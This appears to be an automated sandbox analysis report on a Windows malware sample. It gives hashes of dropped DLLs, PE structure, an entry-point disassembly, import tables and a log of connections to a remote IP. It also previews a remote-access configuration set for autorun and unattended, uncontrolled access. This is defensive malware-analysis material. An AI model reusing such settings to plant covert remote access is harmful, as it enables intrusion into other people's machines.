                                                                                                                                SSDEEP:12288:bj4Q3+oAscridrDg76u3HsBTc9GtIGPi2Emvh5/kJSMl0yomcY/nRwl2Sp:bHYXSTMGtNPitm1yomJ/n+tp
                                                                                                                                MD5:CDC5A8221738C1CA66564755BB58138C
                                                                                                                                SHA1:EF096A2CAF133D217C202C147855F2CEE7ECD105
                                                                                                                                SHA-256:DF5CEF85E92C6FFFAAC0ACDCE645AED3C5FA1F8FE7F9700D84CA08468AD3D5E3
                                                                                                                                SHA-512:A9F3E256518771C1C97374E7AE3EE19EBEC0D794CD740E059DBC8289356CF1FB5D4A19F2677DB2ADBB179A73520AAEC67947DCF4C8BCD930206DE4B6CDCAD4C6
                                                                                                                                Malicious:true
                                                                                                                                Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1724088
                                                                                                                                Entropy (8bit):6.573221633911959
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:49152:uSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSvSSSSSSSSSSSSSSSlwwwwwwwwwwwwwwI:uSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSO
                                                                                                                                MD5:E0E559010A1CC7CB6B6F754E8833A156
                                                                                                                                SHA1:0ADB286A1511B9D5820B042EE7D059DAEE8D0978
                                                                                                                                SHA-256:A49D90D39BCF0FB183A8E2DFDA90E1B745565DDC25C0CC92ED7068868CB8F3E4
                                                                                                                                SHA-512:3225A22CA8044FAFE03C005C55924B71EC2D3C9EE2325B45703EADC1F912DD867DD7FADCA0652FA2ACD46D4067575377388134E3CC58B13C0F82540224E98221
                                                                                                                                Malicious:true
                                                                                                                                Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):17648
                                                                                                                                Entropy (8bit):6.317642988990049
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:ZPkFNiOMTd1th9gQIim+4vBDVU376TFNiWC:iNhMpXgIr4vBBYANi1
                                                                                                                                MD5:ACF7048E2347CFD66CD17648DBFBAF45
                                                                                                                                SHA1:DF5A12E399176771DC8CF2F7D0CF5548E41E2BB3
                                                                                                                                SHA-256:F1CFFBC2ADA8491755C76360AAD14314DEB576AA65F503E52FA24DEE7D33D8E7
                                                                                                                                SHA-512:51A53CB700FBB7ABF3BDA3101ED0885572460C1686D07C3D2125C8AA6F0834E30528BEE78CC40EE9270714A16AC769D16F5A916F37F0E48BBF7121202E58E0C0
                                                                                                                                Malicious:true
                                                                                                                                Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):586
                                                                                                                                Entropy (8bit):5.203397968860563
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:L1YWzRcSbZKsNlTQ/dw/7y/x5/D++472p+fso+9hffAaJYQMhsK/qI8qP:Z7zRcSbZKKlcMypJD5KxkiaJosBq
                                                                                                                                MD5:5D7974984AE3D593B7887CC7BDA866DD
                                                                                                                                SHA1:9C0B2EC2659812F1E46F2D32F82E61DF223C674C
                                                                                                                                SHA-256:7888BDB632F1BC5EB6DAE5624FE9065868D279E50ACC569D3DDE0F6DB1C95051
                                                                                                                                SHA-512:7BDACFBCE85726A683C3A316F578A88D5991E37C8FB1E13FC4715141F5752E7FD5D145AC36730B637E26FD3198EDE2D27E86F5CF7283A0C9B08579B1056B0B70
                                                                                                                                Malicious:false
                                                                                                                                Preview:[config]..Security.FixPass=4297F44B13955235245B2497399D7A93..Main.Autorun=1..Main.CloseButtonOperation=0..Main.CheckUpdates=0..Security.UseLocalSecuritySettings=1..Security.DynPassKind=0..Security.PassLifetime=0..Security.CanWinAuth=1..Security.AccessKind=1..Security.CanWinLoginAnotherUser=1..Security.UNCONTROLLED_ACCESS=1..Security.CanWinLoginNotAdmin=1..Security.DenyRemoteSettingsControl=0..Security.DenyLockControls=0..Log.ServerStoreTechLog=0..Main.AWAYMODE_REQUIRED=1..Main.LogsLifetime=1..Main.LogsForMail2Support=1..ProxySettings.UseKind=1..ProxySettings.StoreUserAndPassw=1..
                                                                                                                                Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2236144
                                                                                                                                Entropy (8bit):5.624149670958732
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24576:2HGHuX4EewGQcPryfFMoxJ+4PulW/ChEIgTS/zRUm:2HGOX4CGQtMs+WuVge/em
                                                                                                                                MD5:BCCF6A5C2595EEA84533692BB788D8BB
                                                                                                                                SHA1:24318226F145E52B7633A4E9E844D6EAD43B75AC
                                                                                                                                SHA-256:ABF75DE674428E112F90F1C618218FF73EF851F4F09C5F5BA8B69E79A6C74DBF
                                                                                                                                SHA-512:78F24F0812AAE31E83340ADEB1A1AE8C00EDFDF483E299706F863CB713BFDC2501B5418CE8F8BD9131E3C704BFFB58A8CA05C5E0A75EB19F15E0409C5B74E35B
                                                                                                                                Malicious:true
                                                                                                                                Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2533560
                                                                                                                                Entropy (8bit):6.236092740507617
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:49152:y+PXMbxU8+hh5Mitv70n8yT1CPwDv3uFfJEkyD9:y+PwEMit0n8A1CPwDv3uFfJC
                                                                                                                                MD5:59A3B581020759D52538425A1F5A53D5
                                                                                                                                SHA1:4E7C528EFEF2C42119C80EFE0AA994B7AA6D2AB6
                                                                                                                                SHA-256:4C94F00150231420A0526E9949AC9F339EB04B16BC18CB8A11C7FD98DB1235D6
                                                                                                                                SHA-512:9D30D8167E787FD4A82444BAAA3703920EC41CBE9C684010B63564DE04E00D590C8081006C68627B8297D2715194D4B80C23B959E554D42B2770664D1ED1B79E
                                                                                                                                Malicious:true
                                                                                                                                Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2098416
                                                                                                                                Entropy (8bit):6.277915381502377
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:49152:Vkv4EyvQ/qpyr0kAYdQqqW6qvHewDe01CPwDv3uFR0b5YrpsJ:VkvXyvQ/qpyr0kAd66oewv1CPwDv3uFI
                                                                                                                                MD5:1AFC9BD5E625E85B696141F62FBA4325
                                                                                                                                SHA1:56FB325125F436D7408808446D58AF50F8AA3BFC
                                                                                                                                SHA-256:83A1E3CBE242B978B9F55273B7B2648D0492B741FF561C0EC1C6AD9A4AEDAB47
                                                                                                                                SHA-512:02C2CF9DBC319C2AAF324175CFD3E435824439F33B4CA697324F1B8FF4331D7BDE80DE46909FC629193EF02DEB40853E295B35DC2E3B094D116B5DD783919213
                                                                                                                                Malicious:true
                                                                                                                                Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):546816
                                                                                                                                Entropy (8bit):6.657309146326691
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12288:DEnhioDz6zv6pmEmE5A8K8ZOO2rKQrbdCPAEI:Dmbz+vomEBHbZO2YCBI
                                                                                                                                MD5:13CD45DF8AAA584EBD2A40EDE76F1E06
                                                                                                                                SHA1:BAA19E6A965621CB315E5F866EDC179EF1D6B863
                                                                                                                                SHA-256:3FF4E80E327F298A11E116A517BE0963A0B3CD376A6A624CAFFACD586E6B1449
                                                                                                                                SHA-512:285D7265AC05CECDD43650E5DEF9198B5F2F4D63665739BAA059598E41F4CE892248D3CA7E793AC274DC05B4C19CFA11C17FAEA62FC1E3495C94A03851049328
                                                                                                                                Malicious:true
                                                                                                                                Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1388688
                                                                                                                                Entropy (8bit):6.85745413435775
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24576:vNaU+KpPikndiNfzN4jH3PlMQzMjYpOtJqTp/kqg1+:xlUfzN4jH3PlyjYpOLqd/kP1+
                                                                                                                                MD5:3B838DC25E96877A1852966F75A5C44A
                                                                                                                                SHA1:555E1830829B008D66FF591D87AC235F6286AB9A
                                                                                                                                SHA-256:292C9367E5F978D2085192B85BCFEA7DF3A033172703BCCF1FF28A74D65D5AC1
                                                                                                                                SHA-512:B5A7F05CD721FC75B77BB33528F746E865C2277A32F3AA312A974DE903A817B7C83E7698980A496B5D04595B21926E94CF9F70A15CD0882D57BA25014BA775D6
                                                                                                                                Malicious:true
                                                                                                                                Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):713456
                                                                                                                                Entropy (8bit):6.620067101616198
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12288:RPCS0cSUktNimb/JZqNFcbJ3bZJNlvI8CjBMUC6eVc4/SK:RPCS0c1ktNimbqYZJNlvVc4L
                                                                                                                                MD5:96D413CAAF8C7793A96EF200F6695922
                                                                                                                                SHA1:ABFB19A5BEA8724A08A3C709B68C65178E8EFBE5
                                                                                                                                SHA-256:5C6E5346C4EF80E1DD211BD5519311ACA01025CE1D3811113A03E657938F370D
                                                                                                                                SHA-512:93BF7AC89AE64948C3E91294DE89478B0F92D9CEFB71C803ABB324E181D783801C87DD6D806B0DB0D3737B3330E37993AE07B9B7D5AACCA9F9F5C3556E23EEE4
                                                                                                                                Malicious:true
                                                                                                                                Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):541880
                                                                                                                                Entropy (8bit):5.766958615909
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12288:ghUZvMdmP9OwMJvP2jkIgEIdwKADpiw7FCPU2lvzTNl:BhMsPG2udwLdigFyU2lvzTNl
                                                                                                                                MD5:753B75570811052953F336261E3031BB
                                                                                                                                SHA1:2244CCE49368180C1CF6BCA0C57DAEC71401C4F7
                                                                                                                                SHA-256:603C5FD4E29C14DF02937DF765BF76E067A7A4706130D93F947106D0AE09A9DE
                                                                                                                                SHA-512:6C81B813A79077E7157CF7F647A1F3C31A71098037C7003BC40B70E4AADAFCF490FDC01C71A26F8FED8C97BA33B41DF5B8A0D479DA951459CBD56421705813C5
                                                                                                                                Malicious:true
                                                                                                                                Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 168x299, components 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):8097
                                                                                                                                Entropy (8bit):7.94099711365173
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:E9NXj7fQ9/RRN0AinryQKGgjkrEQtxH1AYZ18r:E9NzjGkOujEQ3H1V8r
                                                                                                                                MD5:2302BC48A162783A6A41C278B3F54145
                                                                                                                                SHA1:8C3272769F604DC3AE6C6B98A29CC779532D1783
                                                                                                                                SHA-256:1E5F58772571897E96CCA5ACB597DF65F8775E64D7031D6B2CCDBF22D5181F51
                                                                                                                                SHA-512:465086DFF63176A864C0BC26BCCFA1FBBA0503F9AFD78A86C863C266469F54069D00BBB718440090A065EA92AD0DD42A67B6A6C99ED6B2378F6A721984A806A6
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):970912
                                                                                                                                Entropy (8bit):6.9649735952029515
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12288:LBmFyjLAOQaYkxGXPfY7eiWWcpOKnpTVOIxhK765qlRRb6x4pI23IbJQV:dmFyjLF847eiWWcoGZVOIxh/WxIAIbGV
                                                                                                                                MD5:034CCADC1C073E4216E9466B720F9849
                                                                                                                                SHA1:F19E9D8317161EDC7D3E963CC0FC46BD5E4A55A1
                                                                                                                                SHA-256:86E39B5995AF0E042FCDAA85FE2AEFD7C9DDC7AD65E6327BD5E7058BC3AB615F
                                                                                                                                SHA-512:5F11EF92D936669EE834A5CEF5C7D0E7703BF05D03DC4F09B9DCFE048D7D5ADFAAB6A9C7F42E8080A5E9AAD44A35F39F3940D5CCA20623D9CAFE373C635570F7
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):370488
                                                                                                                                Entropy (8bit):6.86993159214619
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6144:wJ9LiOhPhz85popbbFb06wAQAwq961b/v9MkvCq2/JO+UxK6DvX0C7Uxm//f0Ps7:IBi8q5po9JkyICq2/z6DvsyEE5+PgAEX
                                                                                                                                MD5:82E49683F540F78B2D1759CDE594482F
                                                                                                                                SHA1:352DCBDBBB3C5C927B83389E2AB7F40B66EE716A
                                                                                                                                SHA-256:55D99ECD7F821A4B2FE7E5A0B2CEA213DC79004C1DC413BD003F032C61080576
                                                                                                                                SHA-512:F50A3BCD5905103EEC344D7DAF1C17896DF9039D3E8D5E9BBD771F1E235EC6045D626ED838C9BF3A8F7A66AA5F41F0743EA7D9BDEF7492DA8B36561089E126BF
                                                                                                                                Malicious:true
                                                                                                                                Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1074302464
                                                                                                                                Entropy (8bit):0.0076066072746656796
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:
                                                                                                                                MD5:F9EE295F34E22150DB8EDD2392482148
                                                                                                                                SHA1:60B9700E56D3D79FB0B2DA7DE1E3B964AC4522A4
                                                                                                                                SHA-256:5040D2F22275B4C59FA1D282440B228CA1327A66D5A82A9C6D313271EBAEE91E
                                                                                                                                SHA-512:E8FFDF207E8FC62543D9FE51423053F4F762CFC9C5106A422E1A3F30D96478AEC34C9CE7E381DE2FBA3B0745D1A4723EDEC626528E8EB4C5898D58E764F674AA
                                                                                                                                Malicious:true
                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                Entropy (8bit):7.995848928313772
                                                                                                                                TrID:
                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                                                                                • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                File name:wjpP1EOX0L.exe
                                                                                                                                File size:6'810'986 bytes
                                                                                                                                MD5:34dc961fe0a98ea779d7b673a48c77a0
                                                                                                                                SHA1:7f3cf770da67a60d60c79c82df85eef66eb80d8e
                                                                                                                                SHA256:7ea97972b7a7e37bdc6993c7f00830040acf4ce957243abb85d6c1232baf30c0
                                                                                                                                SHA512:c30c1dd3e4d9f532f5dcd06d95a426769cf9009fd42a1a735463a379d567475fb05708af09c2e79f9aca332b4c3803fc435017ee36e52741cff98790830ccdfb
                                                                                                                                SSDEEP:98304:wasa2kc7PO6oUeKdwO3DpUKgtMnjdxspn/w1fdpgH4LDnVsF+U96vFJvulvy5QE1:PXUzF3DiKgx8fuKnVspq6leQE4qLxj
                                                                                                                                TLSH:176633209BE24872FD9C1B748DA586507E233CAE05F1A8282FFCD56E05BB4559C37F92
                                                                                                                                Icon Hash:2d2e3797b32b2b99
                                                                                                                                Entrypoint:0x4117dc
                                                                                                                                Entrypoint Section:.itext
                                                                                                                                Digitally signed:false
                                                                                                                                Imagebase:0x400000
                                                                                                                                Subsystem:windows gui
                                                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                Time Stamp:0x57051F88 [Wed Apr 6 14:39:04 2016 UTC]
                                                                                                                                TLS Callbacks:
                                                                                                                                CLR (.Net) Version:
                                                                                                                                OS Version Major:5
                                                                                                                                OS Version Minor:0
                                                                                                                                File Version Major:5
                                                                                                                                File Version Minor:0
                                                                                                                                Subsystem Version Major:5
                                                                                                                                Subsystem Version Minor:0
                                                                                                                                Import Hash:20dd26497880c05caed9305b3c8b9109
                                                                                                                                Instruction
                                                                                                                                push ebp
                                                                                                                                mov ebp, esp
                                                                                                                                add esp, FFFFFFA4h
                                                                                                                                push ebx
                                                                                                                                push esi
                                                                                                                                push edi
                                                                                                                                xor eax, eax
                                                                                                                                mov dword ptr [ebp-3Ch], eax
                                                                                                                                mov dword ptr [ebp-40h], eax
                                                                                                                                mov dword ptr [ebp-5Ch], eax
                                                                                                                                mov dword ptr [ebp-30h], eax
                                                                                                                                mov dword ptr [ebp-38h], eax
                                                                                                                                mov dword ptr [ebp-34h], eax
                                                                                                                                mov dword ptr [ebp-2Ch], eax
                                                                                                                                mov dword ptr [ebp-28h], eax
                                                                                                                                mov dword ptr [ebp-14h], eax
                                                                                                                                mov eax, 00410144h
                                                                                                                                call 00007F86D451757Dh
                                                                                                                                xor eax, eax
                                                                                                                                push ebp
                                                                                                                                push 00411EBEh
                                                                                                                                push dword ptr fs:[eax]
                                                                                                                                mov dword ptr fs:[eax], esp
                                                                                                                                xor edx, edx
                                                                                                                                push ebp
                                                                                                                                push 00411E7Ah
                                                                                                                                push dword ptr fs:[edx]
                                                                                                                                mov dword ptr fs:[edx], esp
                                                                                                                                mov eax, dword ptr [00415B48h]
                                                                                                                                call 00007F86D451FCC3h
                                                                                                                                call 00007F86D451F812h
                                                                                                                                cmp byte ptr [00412ADCh], 00000000h
                                                                                                                                je 00007F86D45227BEh
                                                                                                                                call 00007F86D451FDD8h
                                                                                                                                xor eax, eax
                                                                                                                                call 00007F86D4515615h
                                                                                                                                lea edx, dword ptr [ebp-14h]
                                                                                                                                xor eax, eax
                                                                                                                                call 00007F86D451C85Bh
                                                                                                                                mov edx, dword ptr [ebp-14h]
                                                                                                                                mov eax, 00418658h
                                                                                                                                call 00007F86D4515BEAh
                                                                                                                                push 00000002h
                                                                                                                                push 00000000h
                                                                                                                                push 00000001h
                                                                                                                                mov ecx, dword ptr [00418658h]
                                                                                                                                mov dl, 01h
                                                                                                                                mov eax, dword ptr [0040C04Ch]
                                                                                                                                call 00007F86D451D172h
                                                                                                                                mov dword ptr [0041865Ch], eax
                                                                                                                                xor edx, edx
                                                                                                                                push ebp
                                                                                                                                push 00411E26h
                                                                                                                                push dword ptr fs:[edx]
                                                                                                                                mov dword ptr fs:[edx], esp
                                                                                                                                call 00007F86D451FD36h
                                                                                                                                mov dword ptr [00418664h], eax
                                                                                                                                mov eax, dword ptr [00418664h]
                                                                                                                                cmp dword ptr [eax+0Ch], 01h
                                                                                                                                jne 00007F86D45227FAh
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x19000 | 0xe04 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1c000 | 0xb200 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x1b000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x19304 | 0x214 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xf244 | 0xf400 | a33e9ff7181115027d121cd377c28c8f | False | 0.5481717469262295 | data | 6.3752135040515485 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext | 0x11000 | 0xf64 | 0x1000 | caec456c18277b579a94c9508daf36ec | False | 0.55859375 | data | 5.732200666157372 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x12000 | 0xc88 | 0xe00 | 746954890499546d73dce0e994642192 | False | 0.2533482142857143 | data | 2.2967209087898324 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss | 0x13000 | 0x56bc | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x19000 | 0xe04 | 0x1000 | e9b9c0328fd9628ad4d6ab8283dcb20e | False | 0.321533203125 | data | 4.597812557707959 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x1a000 | 0x8 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x1b000 | 0x18 | 0x200 | 3dffc444ccc131c9dcee18db49ee6403 | False | 0.05078125 | data | 0.2044881574398449 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x1c000 | 0xb200 | 0xb200 | c68efe629086e79e677a2d7600755b88 | False | 0.1776465941011236 | data | 4.139057824973333 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x1c41c | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | Dutch | Netherlands | 0.5675675675675675
RT_ICON | 0x1c544 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | Dutch | Netherlands | 0.4486994219653179
RT_ICON | 0x1caac | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | Dutch | Netherlands | 0.4637096774193548
RT_ICON | 0x1cd94 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | Dutch | Netherlands | 0.3935018050541516
RT_STRING | 0x1d63c | 0x68 | data | | | 0.6538461538461539
RT_STRING | 0x1d6a4 | 0xd4 | data | | | 0.5283018867924528
RT_STRING | 0x1d778 | 0xa4 | data | | | 0.6524390243902439
RT_STRING | 0x1d81c | 0x2ac | data | | | 0.45614035087719296
RT_STRING | 0x1dac8 | 0x34c | data | | | 0.4218009478672986
RT_STRING | 0x1de14 | 0x294 | data | | | 0.4106060606060606
RT_RCDATA | 0x1e0a8 | 0x82e8 | data | English | United States | 0.11261637622344235
RT_RCDATA | 0x26390 | 0x10 | data | | | 1.5
RT_RCDATA | 0x263a0 | 0x150 | data | | | 0.8392857142857143
RT_RCDATA | 0x264f0 | 0x2c | data | | | 1.1818181818181819
RT_GROUP_ICON | 0x2651c | 0x3e | data | English | United States | 0.8387096774193549
RT_VERSION | 0x2655c | 0x4f4 | data | English | United States | 0.25630914826498424
RT_MANIFEST | 0x26a50 | 0x62c | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.4240506329113924
DLL | Import
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll | RegQueryValueExW, RegOpenKeyExW, RegCloseKey
user32.dll | GetKeyboardType, LoadStringW, MessageBoxA, CharNextW
kernel32.dll | GetACP, Sleep, VirtualFree, VirtualAlloc, GetSystemInfo, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenW, lstrcpynW, LoadLibraryExW, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetCommandLineW, FreeLibrary, FindFirstFileW, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle, CloseHandle
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleW
user32.dll | CreateWindowExW, TranslateMessage, SetWindowLongW, PeekMessageW, MsgWaitForMultipleObjects, MessageBoxW, LoadStringW, GetSystemMetrics, ExitWindowsEx, DispatchMessageW, DestroyWindow, CharUpperBuffW, CallWindowProcW
kernel32.dll | WriteFile, WideCharToMultiByte, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, SizeofResource, SignalObjectAndWait, SetLastError, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, RemoveDirectoryW, ReadFile, MultiByteToWideChar, LockResource, LoadResource, LoadLibraryW, GetWindowsDirectoryW, GetVersionExW, GetVersion, GetUserDefaultLangID, GetThreadLocale, GetSystemInfo, GetSystemDirectoryW, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesW, GetExitCodeProcess, GetEnvironmentVariableW, GetDiskFreeSpaceW, GetCurrentProcess, GetCommandLineW, GetCPInfo, InterlockedExchange, InterlockedCompareExchange, FreeLibrary, FormatMessageW, FindResourceW, EnumCalendarInfoW, DeleteFileW, CreateProcessW, CreateFileW, CreateEventW, CreateDirectoryW, CloseHandle
advapi32.dll | RegQueryValueExW, RegOpenKeyExW, RegCloseKey, OpenProcessToken, LookupPrivilegeValueW
comctl32.dll | InitCommonControls
kernel32.dll | Sleep
advapi32.dll | AdjustTokenPrivileges
Language of compilation system | Country where language is spoken | Map
Dutch | Netherlands |
English | United States |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                Nov 19, 2024 18:56:14.785121918 CET49852443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:14.785348892 CET49852443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:14.785356045 CET44349852212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:14.786365986 CET49852443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:14.786470890 CET44349852212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:14.786472082 CET49852443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:14.786499977 CET44349852212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:14.786540985 CET49852443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:14.786559105 CET49852443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:14.849709034 CET49860443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:14.849786997 CET44349860212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:14.849884987 CET49860443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:14.850505114 CET49860443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:14.850538969 CET44349860212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:15.583086014 CET44349860212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:15.583193064 CET49860443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:15.584938049 CET49860443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:15.584952116 CET44349860212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:15.585330963 CET44349860212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:15.585951090 CET49860443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:15.587465048 CET49860443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:15.587511063 CET44349860212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:15.587662935 CET44349860212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:15.587709904 CET49860443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:15.587721109 CET44349860212.193.169.65192.168.2.4
